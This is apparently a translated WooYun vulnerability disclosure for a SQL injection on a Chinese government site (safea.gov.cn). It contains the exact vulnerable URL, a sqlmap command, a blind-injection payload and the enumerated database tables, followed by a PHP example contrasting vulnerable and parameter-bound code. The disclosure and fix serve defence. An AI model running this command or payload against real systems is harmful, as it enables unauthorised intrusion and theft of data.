2014-03-16: Details reported to the vendor, awaiting vendor handling
2014-03-22: Vendor has confirmed; details disclosed to the vendor only
2014-04-01: Details disclosed to core white hats and experts in related fields
2014-04-11: Details disclosed to regular white hats
2014-04-21: Details disclosed to intern white hats
2014-04-30: Details disclosed to the public
State Administration of Foreign Experts Affairs of the People's Republic of China: SQL injection, verified with SQLMAP
State Administration of Foreign Experts Affairs, the P.R. of China SQLi
Vulnerability location:
http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1
Note: don't forget --level 5
C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5
sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| cv_info |
| cvedu_info |
| cvexp_info |
| empl_info |
| job_info |
| jobapply_info |
| jobrecom_info |
| key_info |
| menu_info |
| myjoblist_info |
| news_info |
| para_info |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info |
| assign_info |
| col_info |
| top_info |
+----------------------------------------------+
Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplexpert_info |
| emplregis_info |
| enqu_info |
| expert_info |
| filelog_info |
| key_info |
| menu_info |
| news_info |
| para_info |
| proj_info |
| projexp_info |
| safeauser_info |
| tgproj_info |
| tgprojcost_info |
| tgprojref_info |
| tgprojsbm_info |
| yzproj_info |
| yzprojcost_info |
| yzprojref_info |
| yzprojsbm_info |
+----------------------------------------------+
Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| attach_info |
| catalog_info |
| ceproj_info |
| chklog_info |
| cont_info |
| cost_info |
| empl_info |
| filelog_info |
| key_info |
| member_info |
| menu_info |
| news_info |
| para_info |
| projexp_info |
| projext_info |
| projlog_info |
| safeauser_info |
| schedule_info |
+----------------------------------------------+
Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplacct_info |
| emplexpert_info |
Only table names were retrieved; no further digging.
Filter the input more thoroughly.
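The finding above is a boolean-based blind injection through the `d` parameter of `2011_yzjdmd_detail.php`, and "filter more thoroughly" is best met by typing the parameter and binding it rather than by blacklisting strings. As an added example (not the site's own code; the table name `yzjdmd_info`, the column `id`, the DSN and the credentials are assumptions), here is the vulnerable pattern the sqlmap output implies beside a hardened handler:

```php
<?php
// Added example, not the site's own code. Table name, column name, DSN and
// credentials are assumptions; only the script name and the parameter `d`
// come from the report.

// Vulnerable pattern implied by the sqlmap finding: the raw GET value is
// concatenated into the WHERE clause, so a value such as
//   1' RLIKE (SELECT ...) AND 'BJwf'='BJwf
// is parsed as SQL and the page's true/false behaviour leaks data bit by bit.
function fetch_detail_vulnerable(mysqli $db, string $d): ?array
{
    $sql = "SELECT * FROM yzjdmd_info WHERE id = '$d'";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened handler: validate the type first, then bind as a parameter so the
// value is never interpreted as part of the SQL text.
function fetch_detail_hardened(PDO $db, $raw): ?array
{
    // 1. `d` is a record id, so anything but a positive integer is rejected.
    //    The payload above fails this check before any query is built.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // 2. Server-side prepared statement: the value travels separately from the SQL.
    $stmt = $db->prepare('SELECT * FROM yzjdmd_info WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = new PDO(
    'mysql:host=localhost;dbname=example_db;charset=utf8mb4', // placeholder DSN
    'app_user', 'app_password',                                // placeholder credentials
    [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);
$row = fetch_detail_hardened($pdo, $_GET['d'] ?? '');
```

Setting `PDO::ATTR_EMULATE_PREPARES` to false matters on MySQL: with emulation on, PDO interpolates bound values client-side, which is still safe for the integer case here but forgoes the server-side separation of query and data.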
Copyright notice: please credit the source lxj616@乌云 when reposting
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2014-03-22 21:49
Vendor reply: CNVD confirmed and reproduced the described situation and forwarded it via CNCERT to a national information security coordination agency for subsequent notification and handling.
Latest status: None